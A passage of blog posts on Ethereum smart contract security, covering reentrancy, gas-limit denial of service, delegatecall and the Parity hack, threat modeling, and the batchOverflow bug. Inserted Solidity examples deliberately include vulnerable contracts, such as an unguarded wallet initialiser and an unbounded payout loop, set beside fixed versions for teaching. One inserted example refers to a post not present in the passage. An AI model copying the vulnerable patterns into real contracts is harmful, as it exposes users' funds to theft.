[4].</div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">Reentrancy (Recursive Call Attack)</h2><div style="text-align: justify;">One of the major risks of calling external contracts is that they can take over the control flow. In a reentrancy attack (a.k.a. recursive call attack) the called contract uses that control to call back into your contract before the first call has finished, and makes changes to your data that the calling function was not expecting. 
In the classic case the attacker drains funds from the target contract by recursively calling its withdraw function before the balance has been updated [4].</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a schematic representation:</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9viAFm7HwFKEdYOZqWWmo1-AYblrPlC9mUdpXFk3jmi7jEmVa9j5O0GRvrEjVVPDqNw5c-V1ZT3TtNLL1tCpkuTsiavjuBRtS3y0TeE1BV43OC8QlWlHh7S_qVT_KnO3kszLb5AKxll0/s521/0_l7kKDrHMAVRpO-Vb.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="266" data-original-width="521" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9viAFm7HwFKEdYOZqWWmo1-AYblrPlC9mUdpXFk3jmi7jEmVa9j5O0GRvrEjVVPDqNw5c-V1ZT3TtNLL1tCpkuTsiavjuBRtS3y0TeE1BV43OC8QlWlHh7S_qVT_KnO3kszLb5AKxll0/w640-h326/0_l7kKDrHMAVRpO-Vb.jpeg" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div><div style="text-align: justify;"><b>Note:</b> For more information on this type of attack please see [4].</div></div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">SC Denial of Service Attacks</h2><div style="text-align: justify;">Each block has an upper bound on the amount of gas that can be spent, and thus on the amount of computation that can be done. This is the block gas limit. A transaction that needs more gas than this limit cannot fit in any block and will always fail. 
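An added example (not from the original post) of the unbounded-operations vector: a payout contract whose payAll cost grows with every registration until the loop no longer fits in a block, next to a rewrite in which each recipient pulls their own payment at constant cost. Contract and function names are illustrative.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not from the original post. Names are illustrative.

contract PushPayout {
    address[] public recipients;               // grows with every new registrant
    mapping(address => uint256) public owed;

    // Anyone can register for 1 wei, so an attacker can grow the array
    // cheaply with throwaway addresses.
    function register() external payable {
        require(msg.value > 0, "register: zero value");
        if (owed[msg.sender] == 0) {
            recipients.push(msg.sender);
        }
        owed[msg.sender] += msg.value;
    }

    // DoS: gas cost is linear in recipients.length. Once the loop needs more
    // than the block gas limit this function can never succeed again, and
    // even before that, one recipient whose receive() reverts makes the
    // require() below revert the payout for everybody.
    function payAll() external {
        for (uint256 i = 0; i < recipients.length; i++) {
            address r = recipients[i];
            uint256 amount = owed[r];
            if (amount == 0) {
                continue;
            }
            owed[r] = 0;
            (bool ok, ) = r.call{value: amount}("");
            require(ok, "payAll: payout failed");
        }
    }
}

contract PullPayout {
    mapping(address => uint256) public owed;

    function register() external payable {
        require(msg.value > 0, "register: zero value");
        owed[msg.sender] += msg.value;
    }

    // Pull pattern: each recipient pays the gas for their own withdrawal,
    // the cost does not depend on how many others registered, and a
    // recipient that cannot accept Ether only blocks themselves.
    function withdraw() external {
        uint256 amount = owed[msg.sender];
        require(amount > 0, "withdraw: nothing owed");
        owed[msg.sender] = 0;                                // effect before interaction
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "withdraw: transfer failed");
    }
}
```

When a loop over user-controlled data cannot be avoided, bound the work per transaction (process a fixed-size batch and keep a cursor) and never let one failing element revert the whole batch.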
</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The block gas limit leads to a couple of possible Denial of Service vectors:</div><div style="text-align: justify;"><ul><li>Gas Limit DoS on a Contract via Unbounded Operations</li><li>Gas Limit DoS on the Network via Block Stuffing</li></ul></div><div style="text-align: justify;"><b>Note:</b> For more information on DoS attacks see <a href="https://consensys.github.io/smart-contract-best-practices/known_attacks/" target="_blank">consensys.github.io</a></div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">Use Of Delegatecall/Callcode and Libraries</h2><div style="text-align: justify;"><div>According to the Solidity docs [7], there is a special variant of a message call, named delegatecall, which is identical to a message call except that the code at the target address is executed in the context of the calling contract, and msg.sender and msg.value keep their values.</div><div><br /></div><div>This means that a contract can dynamically load code from a different address at runtime. Storage, current address and balance still refer to the calling contract; only the code is taken from the called address. This makes it possible to implement the “library” feature in Solidity: reusable library code that can be applied to a contract’s storage, e.g. in order to implement a complex data structure.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Insecure use of this function was the cause of the <a href="https://blog.openzeppelin.com/on-the-parity-wallet-multisig-hack-405a8c12e8f7/" target="_blank">Parity Multisig Wallet hack in 2017</a>. It is very useful for letting our contract run code from another contract as if that code were part of our own. However, when a catch-all fallback forwards arbitrary calldata with delegatecall(), every public function of the called contract becomes reachable through our contract's address, operating on our storage, by anyone who can craft the call. 
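The proxy described in the Smart Contract Upgradeability post above and the delegatecall behaviour described here, as one added example that is code from neither post, nor from Parity or OpenZeppelin: a minimal proxy that forwards every call to a logic contract with delegatecall and keeps its own bookkeeping in the EIP-1967 slots so that it cannot collide with the logic contract's variables, plus a logic contract with an unguarded initialiser of the kind that sank the Parity wallet next to the guarded version. Contract and function names are illustrative; the two slot constants are the published EIP-1967 values.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.1;

// Added example, not from the original posts. Names are illustrative.

// The access point. Users call this address; the code that runs is whatever
// the implementation slot points to, executed against THIS contract's storage.
contract Proxy {
    // EIP-1967: keccak256("eip1967.proxy.implementation") - 1 and
    // keccak256("eip1967.proxy.admin") - 1. Pseudo-random slots keep the
    // proxy's own state clear of the logic contract's slots 0, 1, 2, ...
    bytes32 private constant IMPL_SLOT =
        0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc;
    bytes32 private constant ADMIN_SLOT =
        0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103;

    constructor(address impl) {
        _set(ADMIN_SLOT, msg.sender);
        _set(IMPL_SLOT, impl);
    }

    function implementation() external view returns (address) {
        return _get(IMPL_SLOT);
    }

    // The "switching addresses" upgrade path: only the admin may repoint it.
    function upgradeTo(address impl) external {
        require(msg.sender == _get(ADMIN_SLOT), "proxy: not admin");
        require(impl.code.length > 0, "proxy: not a contract");
        _set(IMPL_SLOT, impl);
    }

    // Dynamic forwarding: any call whose selector the proxy itself does not
    // define is delegatecalled, calldata unchanged, to the implementation,
    // and its return data or revert data is handed back untouched.
    fallback() external payable {
        _delegate(_get(IMPL_SLOT));
    }

    receive() external payable {
        _delegate(_get(IMPL_SLOT));
    }

    function _delegate(address impl) private {
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    function _get(bytes32 slot) private view returns (address a) {
        assembly { a := sload(slot) }
    }

    function _set(bytes32 slot, address a) private {
        assembly { sstore(slot, a) }
    }
}

// The logic contract. Its variables occupy slots 0, 1, ... of whichever proxy
// delegatecalls into it, so a later WalletV2 must keep them in this order
// and only append new ones.
contract WalletV1 {
    address public owner;
    bool private initialized;

    // VULNERABLE: no guard, so through the proxy's fallback anyone can call
    // it at any time. This is the shape of the bug behind the 2017 Parity
    // wallet hack: re-initialise, become owner, drain.
    function initWalletUnsafe(address _owner) external {
        owner = _owner;
    }

    // Hardened: runs once. Still call it in the same transaction that deploys
    // the proxy, or a front-runner can call it before you do.
    function initWallet(address _owner) external {
        require(!initialized, "wallet: already initialised");
        initialized = true;
        owner = _owner;
    }

    function withdraw(address payable to, uint256 amount) external {
        require(msg.sender == owner, "wallet: not owner");
        (bool ok, ) = to.call{value: amount}("");
        require(ok, "wallet: transfer failed");
    }
}
```

Two review points follow directly from the shape of this code. First, the proxy's own functions (implementation, upgradeTo) shadow any logic function with the same selector, which is why OpenZeppelin's transparent and UUPS proxies route admin and user calls differently. Second, the logic contract deployed on its own also has an uninitialised owner, so lock or initialise it at deployment as well; leaving it open is what allowed the library behind the Parity wallets to be taken over later in 2017.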
This behavior was not accounted for when Parity built its own wallet library: the library's initialisation function was reachable through the wallet's fallback, so an attacker could re-initialise an already deployed wallet and make themselves its owner. </div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">Epilogue </h2><div style="text-align: justify;">Writing secure smart contract code is a lot of work and can be very complex.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><b>References:</b></div><div><ul style="text-align: left;"><li style="text-align: justify;"><a href="https://consensys.github.io/smart-contract-best-practices/general_philosophy/" target="_blank">consensys.github.io</a> [1]</li><li style="text-align: justify;"><a href="https://consensys.github.io/smart-contract-best-practices/recommendations/" target="_blank">consensys.github.io</a> [2]</li><li style="text-align: justify;"><a href="https://www.bitdegree.org/learn/solidity-require#solidity-require-main-tips" target="_blank">www.bitdegree.org</a> [3]</li><li style="text-align: justify;"><a href="https://medium.com/the-capital/security-considerations-while-developing-ethereum-smart-contracts-in-solidity-aed8970341c3" target="_blank">medium.com</a> [4]</li><li style="text-align: justify;"><a href="https://ethereum.stackexchange.com/questions/8551/security-review-checklist-for-a-smart-contract" target="_blank">ethereum.stackexchange.com</a> [5]</li><li style="text-align: justify;"><a href="https://ethernaut.openzeppelin.com/level/0x4E73b858fD5D7A5fc1c3455061dE52a53F35d966">ethernaut.openzeppelin.com</a> [6]</li><li style="text-align: justify;"><a href="https://docs.soliditylang.org/en/v0.4.21/introduction-to-smart-contracts.html#delegatecall-callcode-and-libraries" target="_blank">docs.soliditylang.org</a> [7]</li></ul></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><div class="blogger-post-footer">Penetest Horror 
Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-76933619884130894662021-03-15T13:13:00.003-07:002021-03-15T13:13:30.964-07:00 Elusive Thoughts celebrates 9 years of blogging about hacking <p> <b>Elusive Thoughts celebrates 9 years of blogging about hacking </b></p><p style="text-align: justify;">Elusive Thoughts just created its first <span>non-fungible token (NFT), a digital file whose unique identity and ownership are verified on a blockchain (a digital ledger). </span></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_GSFVNnd6L3dDug0DJmfGyFqA74Z3GnRNNiAbAfsQO04Th9h2Dl5CLEsd61HgjkbwuJZlGGxtSnpRIT_rchmULxC08Q8fHGW-3zTNb9PbfP2nydP6rFsdBVGDH2upIo53MmLVNJ4T1c/s702/NFT_Art.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="702" data-original-width="499" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji_GSFVNnd6L3dDug0DJmfGyFqA74Z3GnRNNiAbAfsQO04Th9h2Dl5CLEsd61HgjkbwuJZlGGxtSnpRIT_rchmULxC08Q8fHGW-3zTNb9PbfP2nydP6rFsdBVGDH2upIo53MmLVNJ4T1c/w454-h640/NFT_Art.png" width="454" /></a></div><br /><span style="text-align: justify;">There is a hidden secret in my NFT, please find it.</span><p></p><p><span style="text-align: justify;"><br /></span></p><p><span style="color: red;"><span style="text-align: justify;">Buy my NFT at </span><a href="https://rarible.com/token/0xd07dc4262bcdbf85190c01c996b4c06a461d2430:306353:0xadf2e43fdb4f39321da579978fa5f6fb2c06479d" target="_blank">rarible.com</a></span></p><p></p><div class="separator" style="clear: both; text-align: center;"> </div><div><br /></div><div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-84283098439574874242021-02-14T12:48:00.001-08:002021-02-15T06:23:34.522-08:00Threat Modeling Smart Contract Applications<h2 style="text-align: 
justify;">INTRODUCTION </h2><div><div style="text-align: justify;">Ethereum Smart Contracts and other complex blockchain programs are new, promising and highly experimental. Therefore, we should expect constant changes in the security landscape, as new bugs and security risks are discovered, and new best practices are developed [1]. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">This article is going to focus on threat modeling of smart contract applications. Threat modeling is a process by which threats, such as the absence of appropriate safeguards, can be identified and enumerated, and mitigations can be prioritized accordingly. The purpose of a threat model is to provide smart contract application defenders with a systematic analysis of what controls or defenses need to be included, given the nature of the system, the probable attacker's profile, the most likely attack vectors, and the assets most desired by an attacker. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Smart contract programming requires a different engineering mindset than we may be used to. The cost of failure can be high, and change can be difficult, making it in some ways more similar to hardware programming or financial services programming than to web or mobile development. </div></div><h2 style="text-align: justify;">FORMAL VERIFICATION AND SMART CONTRACTS</h2><div style="text-align: justify;">At this point we should make clear that besides threat modeling, or as part of the threat modeling process, formal verification should also be mandatory. Formal verification is the act of proving or disproving the correctness of the intended algorithms underlying a system with respect to a certain formal specification or property, using formal methods of mathematics. 
In a few words, it is crucial for the code to do what it is supposed to do [2].</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">A very good project example, as far as formal verification is concerned, is the Cardano cryptocurrency technology. Cardano is developing its technology using a provably correct security model that provides a guaranteed limit on adversarial power [3]. Cardano also uses Haskell as its programming language, a language that facilitates formal verification.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><h2>SMART CONTRACT ASSETS</h2><div>In order to continue analyzing the Smart Contract ecosystem, we will define what assets are in the context of Smart Contract Applications. </div><div><br /></div><div>Assets are:</div><div><ul><li>The Smart Contract functions we require to protect. </li><li>The Smart Contract data we require to protect.</li></ul></div></div><h2 style="text-align: justify;">THREAT ACTORS</h2><div><span style="text-align: justify;">This section is going to focus on the threat actors of smart contract applications. A threat actor or malicious actor is a person or entity responsible for an event or incident that impacts the safety or security of smart contract applications. In the context of this article, the term is used to describe individuals and groups that perform malicious acts. 
</span></div><div><span style="text-align: justify;"><br /></span></div><div><span style="text-align: justify;">More specifically, we are going to reference the following actors:</span></div><div><ul style="text-align: left;"><li><span style="text-align: justify;">Nation State: actor with unlimited resources </span></li><li><span style="text-align: justify;">Organized Crime: actor with significant resources </span></li><li><span style="text-align: justify;">Insiders: actor with extensive knowledge of the system </span></li><li><span style="text-align: justify;">Hacktivists: actor with ideology as a motive and limited resources</span></li><li><span style="text-align: justify;">Script Kiddies: actor with limited knowledge of the technology and very few resources</span></li><li><span style="text-align: justify;">Other actors, such as accidental attacks</span></li></ul></div><b>Note: </b>From a threat intelligence perspective, threat actors are often categorized as either unintentional or intentional and as either external or internal. Threat agents should also be categorized primarily by access, e.g. external or internal actors. The likelihood of a threat is closely related to the attacker's motive, e.g. a nation state attacker has a high level of motivation, while Script Kiddies have a low level of motivation and therefore a low likelihood. <h2 style="text-align: justify;">SMART CONTRACT THREAT ACTORS</h2><div style="text-align: justify;">In this section we are going to discuss the threat actors that are related only to Smart Contract Applications. Each technology has its own peculiarities, and blockchain technologies have their own. 
</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The actors that are related to Smart Contracts are of two types:</div><div style="text-align: justify;"><ul><li>Malicious Smart Contracts </li><li>Humans interacting with Smart Contracts through DApps or directly.</li></ul><div>Smart contracts can call functions of other contracts and are even able to create and deploy other contracts (e.g. issuing coins). There are several use cases for this behavior. </div><div><br /></div><div>A few use cases of interacting with other contracts are described below:</div><div><ul><li>Use contracts as data stores</li><li>Use other contracts as libraries</li></ul><div><div>In the context of this article, an Actor interacting with a Smart Contract from outside the blockchain is an external Actor, and an Actor interacting with a smart contract from inside the blockchain is an internal Actor. </div></div></div></div><h2 style="text-align: justify;">COMMON SMART CONTRACT ATTACKS</h2>The following is a list of known attacks which we should be aware of, and defend against, when writing smart contracts [4]. <div><ul style="text-align: left;"><li>Reentrancy<ul><li>Reentrancy on a Single Function</li><li>Cross-function Reentrancy</li></ul></li><li>Timestamp Dependence</li><li>Integer Overflow and Underflow</li><li>DoS with (Unexpected) revert</li><li>DoS with Block Gas Limit</li><li>Gas Limit DoS on the Network via Block Stuffing</li><li>Insufficient gas griefing</li><li>Forcibly Sending Ether to a Contract</li></ul>We are not going to explain each attack here. For more information please see the link [4].<h2 style="text-align: justify;">ATTACK TREES</h2><div><div style="text-align: justify;">This section is going to focus on the attack trees of contract applications. Attack Trees provide a formal, methodical way of describing the security of systems, based on varying attacks. 
A tree structure is used to represent attacks against a system, with the goal as the root node and the different ways of achieving that goal as leaf nodes. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">The attack attributes assist in associating risk with an attack. An Attack Tree can include the special knowledge or equipment that is needed, the time required to complete a step, and the physical and legal risks assumed by the attacker. The values in the Attack Tree could also be operational or development expenses. An Attack Tree supports design and requirement decisions. If an attack costs the perpetrator more than the benefit, that attack will most likely not occur. However, if there are easy attacks that may result in a benefit, then those need a defense.</div></div><div><span style="text-align: justify;"><br /></span></div><div><span style="text-align: justify;">Below we can see a typical client browser attack tree:</span></div><div><span style="text-align: justify;"><br /></span></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO_-tE6uCtJLwjbmhNji5hAwsQNbc1_gls3SPSrOSDjMmV03dMZOlCUIDrnAqxbZCXwHU_TJqViYkUfs6eZ8U2c4xczEhJWzeRg47VWqCixZcsFa_MkPicaYQXTJ94rWqSADdhAwQpxAY/s581/Untitled+Diagram+%25283%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="581" data-original-width="441" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgO_-tE6uCtJLwjbmhNji5hAwsQNbc1_gls3SPSrOSDjMmV03dMZOlCUIDrnAqxbZCXwHU_TJqViYkUfs6eZ8U2c4xczEhJWzeRg47VWqCixZcsFa_MkPicaYQXTJ94rWqSADdhAwQpxAY/w486-h640/Untitled+Diagram+%25283%2529.jpg" width="486" /></a></div><br /><span style="text-align: justify;"><br /></span></div><h2 style="text-align: justify;">ABUSE CASE DIAGRAMS</h2><div><div style="text-align: justify;">The relationships between the work products of a security engineering process can be hard 
to understand, even for persons with a strong technical background but little knowledge of security engineering. Market forces are driving software practitioners who are not security specialists to develop software that requires security features. When these practitioners develop software solutions without appropriate security-specific processes and models, they sometimes fail to produce effective solutions. The same happens with Smart Contract development, which is why abuse case diagrams should be used to model the security requirements of Smart Contract applications.</div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">We will define an abuse case as a specification of a type of complete interaction between a system and one or more actors, where the results of the interaction are harmful to the system, one of the actors, or one of the stakeholders in the system.</div></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a simple use case diagram:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStdgcVsgf3J0px8cCloCpQre26ZPB7K4dxrxunlCWIMJUePEkmNpUrGQ6EP3JMWG58ZTFDZdXtp-N9HhvsqBX8Eh5gzGAEW_N5EkyyiRx6Lqd2p45U_G0kFDKB2_AHu-1hqyzIiWiD38/s808/SmartContracts1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="808" height="403" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhStdgcVsgf3J0px8cCloCpQre26ZPB7K4dxrxunlCWIMJUePEkmNpUrGQ6EP3JMWG58ZTFDZdXtp-N9HhvsqBX8Eh5gzGAEW_N5EkyyiRx6Lqd2p45U_G0kFDKB2_AHu-1hqyzIiWiD38/w640-h403/SmartContracts1.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Below we can see a simple abuse case diagram with an external actor:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: 
center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBcPou9zoBHvwfCCukb00Bg554tih0B9KYHAX2tddDCS5Daz8MEtgD6AyqCLlPhlr5FADuDMTvEhQZUNGrXw2N4RGw-YWtq20aKsYLDx0rckcKrT6aP4WA4Tv6VXNPNEKt_qrCgsjmW0Q/s835/Untitled+Diagram.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="669" data-original-width="835" height="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBcPou9zoBHvwfCCukb00Bg554tih0B9KYHAX2tddDCS5Daz8MEtgD6AyqCLlPhlr5FADuDMTvEhQZUNGrXw2N4RGw-YWtq20aKsYLDx0rckcKrT6aP4WA4Tv6VXNPNEKt_qrCgsjmW0Q/w640-h512/Untitled+Diagram.jpg" width="640" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">In the diagram above an external bad actor is manipulating the login function externally. This is a typical client browser attack, e.g. the DApp has a stored XSS and the attacker installs a fake login page, or the DApp does not handle users' private keys correctly, etc. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see another simple abuse case diagram with an external actor:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVShMYRBGC47zc_Zq_Vug3uE1XiLPeqFpDUTtdHBq01XHZ-Qdpae-Esd-Tn3IYuymbjp-hHSRyzbWuHkb4k8mCrHM5G_yYKDkbiTdQvAexAWlL4X6Yks3tBleukHPS7e_0GdPIjUz2JqE/s935/Untitled+Diagram+%25281%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="935" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVShMYRBGC47zc_Zq_Vug3uE1XiLPeqFpDUTtdHBq01XHZ-Qdpae-Esd-Tn3IYuymbjp-hHSRyzbWuHkb4k8mCrHM5G_yYKDkbiTdQvAexAWlL4X6Yks3tBleukHPS7e_0GdPIjUz2JqE/w640-h348/Untitled+Diagram+%25281%2529.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Again in the diagram above an 
external bad actor is manipulating the approve function externally. This is a typical client browser attack, e.g. the DApp has a CSRF vulnerability and the attacker exploits it through a phishing attack, etc. </div><div style="text-align: justify;"><br /></div><div style="text-align: justify;">Below we can see a simple abuse case diagram with an internal actor:</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiCpbAQQSAdSls5XyGIubdOlmLgXAA6ntI_X5br5BbEU7dJjGf1SIpQZ8QZAnMJjV9hhhIq52w3I9F9mXacw_Lmjl7gZEt69CqI3adXXr791mWB9XPNufpdP46cgplyLJMWVgq6uS-Gts/s958/Untitled+Diagram+%25282%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="509" data-original-width="958" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiCpbAQQSAdSls5XyGIubdOlmLgXAA6ntI_X5br5BbEU7dJjGf1SIpQZ8QZAnMJjV9hhhIq52w3I9F9mXacw_Lmjl7gZEt69CqI3adXXr791mWB9XPNufpdP46cgplyLJMWVgq6uS-Gts/w640-h340/Untitled+Diagram+%25282%2529.jpg" width="640" /></a></div><br /><div style="text-align: justify;">Again in the diagram above a bad actor, this time an internal one, is manipulating the approve function internally. This is an attack conducted internally from a malicious contract e.g. 
running a Reentrancy attack through the fallback function, etc.</div><div style="text-align: justify;"><h2>LAST WORDS</h2><div>Before releasing any Smart Contract system, make sure the system is pen-tested, the code is reviewed, and a formal verification of the contract is in place.</div><div><br /></div><div>For code reviews make sure to:</div><div><ul><li>Use a consistent code style</li><li>Avoid leaving commented-out code</li><li>Avoid unused code and unnecessary inheritance </li><li>Use a fixed version of the Solidity compiler </li><li>Analyse gas usage </li></ul></div><div>For the pen-test make sure to:</div><div><ul><li>Run a normal Web App pen-test against the web component of the DApp</li><li>Check how the DApp is interacting with the Smart Contract</li></ul><div>The logical flow to follow would be:</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcYt4F3nGT1fVfdD68r-TD0atP8fxSqYJSlEhBU2ZvqaAsuLwMtx5xz7cSVZlDM4NsQSKH9ROcMVggjLRAixCy8tRs8KnEnT8wdfIDKZn2xZ1533nny8ST-z8nnkaOyFOwNc9dq6HRxM/s601/Untitled+Diagram+%25284%2529.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="601" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRcYt4F3nGT1fVfdD68r-TD0atP8fxSqYJSlEhBU2ZvqaAsuLwMtx5xz7cSVZlDM4NsQSKH9ROcMVggjLRAixCy8tRs8KnEnT8wdfIDKZn2xZ1533nny8ST-z8nnkaOyFOwNc9dq6HRxM/w400-h160/Untitled+Diagram+%25284%2529.jpg" width="400" /></a></div><br /><div><br /></div><div><h2>TOOLS TO USE</h2></div><div>Below is a list of tools we can use to test our Smart Contract system:</div><div><ul><li>Mythril: a security analysis tool for EVM bytecode. It detects security vulnerabilities in smart contracts built for Ethereum, Hedera, Quorum, Vechain, Rootstock, Tron and other EVM-compatible blockchains.</li><li>Solhint: an open source project for linting Solidity code. It provides both security and style guide validations.</li></ul></div></div><div><b>References:</b> </div></div><div style="text-align: justify;"><ul><li><a href="https://consensys.github.io/smart-contract-best-practices/general_philosophy/" target="_blank">consensys.github.io</a> [1]</li><li><a href="https://en.wikipedia.org/wiki/Formal_verification">en.wikipedia.org</a> [2]</li><li><a href="https://why.cardano.org/en/science-and-engineering/formal-specification-and-verification/" target="_blank">why.cardano.org</a> [3]</li><li><a href="https://consensys.github.io/smart-contract-best-practices/known_attacks/" target="_blank">consensys.github.io</a> [4]</li><li><a href="https://medium.com/@MyPaoG/explaining-the-dao-exploit-for-beginners-in-solidity-80ee84f0d470" target="_blank">medium.com</a> [5]</li><li><a href="https://www.zupzup.org/smart-contract-interaction/" target="_blank">www.zupzup.org</a> [6]</li><li><a href="https://docs.soliditylang.org/en/latest/contracts.html?highlight=fallback#fallback-function" target="_blank">docs.soliditylang.org</a> [7]</li><li><a href="https://www.andrew.cmu.edu/course/95-750/docs/CaseModels.pdf" target="_blank">www.andrew.cmu.edu</a> [8]</li><li><a href="https://arvanaghi.com/blog/pentesting-ethereum-dapps/" target="_blank">arvanaghi.com</a> [9]</li></ul><div><br /></div></div><p style="text-align: justify;"><br /></p></div><div class="blogger-post-footer">Penetest Horror 
Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-87457409136516667372021-02-06T13:46:00.004-08:002021-02-07T08:31:15.062-08:00Get Rich Or Die Trying<h2 style="text-align: left;">Introduction</h2><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv-i3wwfeVK97y2AjsVv5EHGh44dqsFrDEWfUEGGKLomk7ZkCKKxgK_xBbs3DfqhumzKa0vrFR8J7h_jwBGgMCCreWK7NNoWKHIA_X_XlZTwDoGEQy7O0fUF0gbycT6Zwvqx_HMtrgRY/s225/download.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="225" data-original-width="225" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv-i3wwfeVK97y2AjsVv5EHGh44dqsFrDEWfUEGGKLomk7ZkCKKxgK_xBbs3DfqhumzKa0vrFR8J7h_jwBGgMCCreWK7NNoWKHIA_X_XlZTwDoGEQy7O0fUF0gbycT6Zwvqx_HMtrgRY/w200-h200/download.png" width="200" /></a></div><br /><div style="text-align: justify;"><br /></div><div style="text-align: justify;">This article is going to focus on <i>"Programmable Money Overflow Attacks"</i> on Ethereum, and this is the way hackers can become rich and famous. More specifically we are going to discuss the batchOverflow attack. The batchOverflow bug was identified in multiple ERC20 Smart Contracts [3] (CVE-2018-10299) back in 2018, when Ethereum was relatively new [1]. </div><div style="text-align: justify;"><i><br /></i></div><div style="text-align: justify;">The batchOverflow attack is a typical integer overflow attack in the batchTransfer function of the smart contract implementation of the Beauty Ecosystem Coin (BEC). BEC was an Ethereum ERC20 compliant token that allowed attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018 [2]. 
But before we move on to replicating the attack, it is better if we explain a few Blockchain properties.</div><div style="text-align: justify;"><br /></div><h2 style="text-align: justify;">The Code Is Law Principle </h2><div style="text-align: justify;">The <i>"code is law principle"</i> is the principle that no one has the right to censor the execution of code on the ETH blockchain. In layman's terms this means that as soon as a smart contract is deployed on the ETH blockchain, its code cannot change. One of the main defining properties of Ethereum Smart Contracts is that their code is immutable. Blockchain immutability means that all the engaging parties agree to the terms, or “code”, of the Smart Contract, and that code can’t be changed by any party unilaterally [4]. This is the main reason a Smart Contract becomes trustworthy.</div><div style="text-align: justify;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTgyj_B0QDr7dPCmWBaIlx9UWyAltPUvKYCtIIiBYudJth-Ny78mkDIlMso2LReBx615J26uQBlqD0dDDdpzfhYov9itAJSADF45481jJ3DpGG7biO-bMDs2sDAt5kYyg_d8rGDEt2PaQ/s225/download.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="225" data-original-width="225" 